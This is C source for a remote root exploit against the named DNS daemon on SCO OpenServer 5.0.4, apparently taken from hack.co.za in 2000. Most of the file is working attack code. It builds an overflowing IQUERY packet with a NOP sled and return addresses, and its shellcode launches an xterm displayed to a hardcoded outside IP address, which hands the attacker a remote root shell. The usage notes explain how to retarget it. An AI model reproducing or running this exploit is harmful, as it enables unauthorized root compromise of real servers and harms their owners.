/*
 * !!!! Private do not distribute !!!!
 *
 * <sconamedx.c> Remote root exploit
 *
 * Offset: named 
 * 0 -> SCO OpenServer 5.0.4
 *
 * Usage: 
 * $ cc sconamedx.c -o sconamedx
 * $ sconamedx <host>
 * ( !! Dont forget to modify  the source code
 *      and change the return ip and its  size. !! )
 *
 */ 
                                 
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <time.h>
#include <string.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>
#include <netdb.h>

#define NOP 0x90
#define BUFLEN 800
#define OFFSET 0x80472c0 // named started from console
//#define OFFSET 0x8046ae0 // named started from x-windows
#define ALIN 2

char hell[] =
 "\x31\xdb" // xorl %ebx,%ebx
 "\x31\xc0" // xorl %eax,%eax
 "\xeb\x38" // jmp uno
 "\x5e" // dos: popl %esi
 "\x8b\xfe" // movl %esi,%edi
 "\x89\x7e\x3c" // movl %edi,60(%esi) 
 "\x8d\x7e\x14" // leal 20(%esi),%edi
 "\x89\x7e\x40" // movl %edi,64(%esi) 
 "\x8d\x7e\x28" // leal 40(%esi),%edi
 "\x89\x7e\x44" // movl %edi,68(%esi) 
 "\x89\x5e\x48" // movl %ebx,72(%esi)  
 "\x8d\x7e\x3c" // leal 60(%esi),%edi
 "\x89\xf9" // movl %edi,%ecx
 "\x89\x5e\xf3" // movl %ebx,-13(%esi)
 "\x88\x5e\xf8" // movb %bl,-8(%esi)
 "\x88\x5e\x12" // movb %bl,18(%esi)
 "\x88\x5e\x1c" // movb %bl,28(%esi) 
 "\x88\x5e" // movb %bl,5X(%esi)

/****************************************************************************/
// Change this according to the return-ip size -> strlen(x.x.x.x:0.0)

"\x38" 

// 19 -> \x3b | 18 -> \x3a | 17 -> \x39 | 16 -> \x38 | 15 -> \x37 | 14 -> \x36
// 13 -> \x35 | max 19 => 111.111.111.111:0.0 | min 11 => 1.1.1.1:0.0
/****************************************************************************/

"\x53" // pushl %ebx
"\x51" // pushl %esi 
"\x56" // pushl %ecx 
"\x56" // pushl %ecx   
"\xb0\x3b" // movb 0x3b, %al
"\x9a\xaa\xaa\xaa\xaa\x07\xaa" // lcall 0x7,0x0
"\x90\x90"
"\xe8\xc3\xff\xff\xff" // uno: call dos
"/usr/bin/X11/xtermAA"  
"-displayAAAAAAAAAAAA" 

/****************************************************************************/
// Change this according to the return-ip -> x.x.x.x:0.0

"62.81.102.96:0.0AAAA"

// Fill the rest with 'A' 
/****************************************************************************/

"AAAA" 
"AAAA" 
"AAAA" 
"AAAA"; 

char buff[BUFLEN];


void addchar(char *str, char ch)
{
    unsigned int len;

    len = strlen(str);
    str[len] = ch;
    str[len + 1] = 0;
}

int lookup_host(ra, hn, rp)
struct sockaddr_in *ra;
char *hn;
unsigned short rp;
{
    ra->sin_family = AF_INET;
    ra->sin_port = htons(rp);
    if ((ra->sin_addr.s_addr = inet_addr(hn)) == -1) {
        struct hostent *he;

        if ((he = gethostbyname(hn)) != (struct hostent *) NULL) {
            memcpy(&ra->sin_addr.s_addr, he->h_addr, 4);
            return 1;
        } else
            herror("Unable to resolve hostname");
    } else
        return 1;
    return 0;
}

void attack_bind(ra, loc)
struct sockaddr_in ra;
char *loc;
{
    int sd, pktlen, sockdesc;
    char keypkt[6000], rname[6000];
    struct hostent *he;

    if((sd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("cannot open tcp socket");
        return; }
    
    printf("Connecting to nameserver via TCP...\n");
    
    fflush(stdout);
    
    if (connect(sd, (struct sockaddr *) &ra, sizeof(ra)) == -1) {
        perror("Unable to connect");
        close(sd);
        return; }
    
    printf("Sending overflow...\n");

    if ((he = gethostbyaddr((char *) &ra.sin_addr, sizeof(ra.sin_addr), AF_INET)) == (struct hostent *) NULL)
        sprintf(rname, "%s", inet_ntoa(ra.sin_addr));
    else
        strncpy(rname, he->h_name, sizeof(rname));

    pktlen = make_keypkt(keypkt);
    send_packet(sd, keypkt, pktlen);
    exit(0);
}

int make_keypkt(pktbuf)
char *pktbuf;
{
    HEADER *dnsh;
    char *ptr = pktbuf;
    int pktlen = 0;
    unsigned long ttl = 31337;

    memset(pktbuf, 0, sizeof(pktbuf));

    dnsh = (HEADER *) ptr;
    dnsh->id = htons(rand() % 65535);
    dnsh->qr = 0;
    dnsh->opcode = IQUERY;
    dnsh->aa = 0;
    dnsh->tc = 0;
    dnsh->rd = 1;
    dnsh->ra = 1;
    dnsh->unused = 0;
    dnsh->rcode = 0;
    dnsh->qdcount = htons(0);
    dnsh->ancount = htons(1);
    dnsh->nscount = htons(0);
    dnsh->arcount = htons(0);
    pktlen += sizeof(HEADER);
    ptr += sizeof(HEADER);
    *(ptr++) = '\0';
    pktlen++;

    PUTSHORT(T_A, ptr);
    PUTSHORT(C_IN, ptr);
    PUTLONG(ttl, ptr);
    PUTSHORT((strlen(buff) + 1), ptr);

    memcpy(ptr + 1, buff, strlen(buff) + 1);
    ptr = ptr + (strlen(buff) + 1);

    pktlen += ((sizeof(short) * 3) + sizeof(long) + (strlen(buff) + 1));

    return pktlen;
}

int send_packet(sd, pktbuf, pktlen)
int sd, pktlen;
char *pktbuf;
{
    char tmp[2], *tmpptr;

    tmpptr = tmp;
    PUTSHORT(pktlen, tmpptr);
    if (write(sd, tmp, 2) != 2 || write(sd, pktbuf, pktlen) != pktlen) {
        perror("write failed");
        return 0;
    }
    close(sd);
    return 1;
}

void usage(char *pname)
{
    printf("\nUsage: sconamedx <host> [offset]\n");
    printf("You have to modify the source code and recompile to define the return ip\n\n");
}

int main(argc, argv)
int argc;
char *argv[];
{
    int i;
    struct sockaddr_in ra;
    unsigned long addr;
    unsigned char jmp;

    int offset = 0;

    if (argc < 2) {
        usage(argv[0]);
        exit(1); }
        
    if (argc == 3)
        offset += atoi(argv[2]);

    addr = OFFSET + offset;

    printf("hell[] length: %i\n", strlen(hell));
    printf("buffer length: %i\n", BUFLEN);
    printf("offset: %i\n", offset);
    printf("address: 0x%lx\n", addr);

    memset(buff,0x90,BUFLEN);
    memcpy(buff+500,hell,strlen(hell));
    for(i=650+ALIN;i<BUFLEN-4;i+=4)
	*(int *)&buff[i]=addr;

    if (!lookup_host(&ra, argv[1], NAMESERVER_PORT))
        return;

    srand(time(NULL));
    attack_bind(ra, argv[1]);
    exit(0);
}
/*                   www.hack.co.za   [21 September 2000]*/